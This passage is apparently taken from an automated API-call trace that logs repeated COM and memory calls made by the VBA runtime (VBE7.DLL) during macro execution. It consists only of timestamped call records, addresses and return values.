IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3770 [0060.537] _mbscpy_s (in: _Dst=0x1d39dbb3770, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3770) returned 0x0 [0060.537] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.537] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.537] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.537] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.537] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.537] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.537] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.537] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3770) [0060.537] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.537] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.537] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.537] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.537] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.537] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.537] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.537] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d70000 [0060.538] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3d90 [0060.538] _mbscpy_s (in: _Dst=0x1d39dbb3d90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3d90) returned 0x0 [0060.538] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.538] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.538] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.538] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.538] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.538] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.538] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.538] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3d90) [0060.538] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.538] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.539] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.539] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.539] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.539] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.539] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.539] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39863a050, cb=0x1000) returned 0x1d3984a9f40 [0060.539] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb39d0 [0060.539] _mbscpy_s (in: _Dst=0x1d39dbb39d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb39d0) returned 0x0 [0060.539] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.539] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.539] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.539] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.539] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.539] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.539] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.539] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb39d0) [0060.539] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.539] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.539] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.539] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.539] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.539] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.539] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.539] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3970 [0060.539] _mbscpy_s (in: _Dst=0x1d39dbb3970, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3970) returned 0x0 [0060.539] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.540] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.540] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.540] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.540] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.540] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.540] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.540] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3970) [0060.540] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.540] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.540] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.540] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.540] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.540] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.540] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.540] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3d90 [0060.540] _mbscpy_s (in: _Dst=0x1d39dbb3d90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3d90) returned 0x0 [0060.540] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.540] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.540] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.540] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.540] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.540] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.540] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.540] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3d90) [0060.540] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.540] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.540] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.541] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.541] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.541] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.541] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.541] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3770 [0060.541] _mbscpy_s (in: _Dst=0x1d39dbb3770, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3770) returned 0x0 [0060.541] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.541] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.541] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.541] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.541] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.541] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.541] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.541] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3770) [0060.541] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.541] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.541] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.541] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.541] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.541] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.541] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.541] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3b70 [0060.541] _mbscpy_s (in: _Dst=0x1d39dbb3b70, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3b70) returned 0x0 [0060.541] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.541] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.541] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.541] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.541] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.542] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.542] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.542] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3b70) [0060.542] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.542] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.542] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.542] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.542] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.542] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.542] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.542] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3c90 [0060.542] _mbscpy_s (in: _Dst=0x1d39dbb3c90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3c90) returned 0x0 [0060.543] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.543] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.543] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.543] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.543] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.543] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.543] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.543] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3c90) [0060.543] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.543] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.543] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.543] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.543] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.543] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.543] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.543] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3bf0 [0060.544] _mbscpy_s (in: _Dst=0x1d39dbb3bf0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3bf0) returned 0x0 [0060.544] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.544] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.544] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.544] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.544] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.544] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, 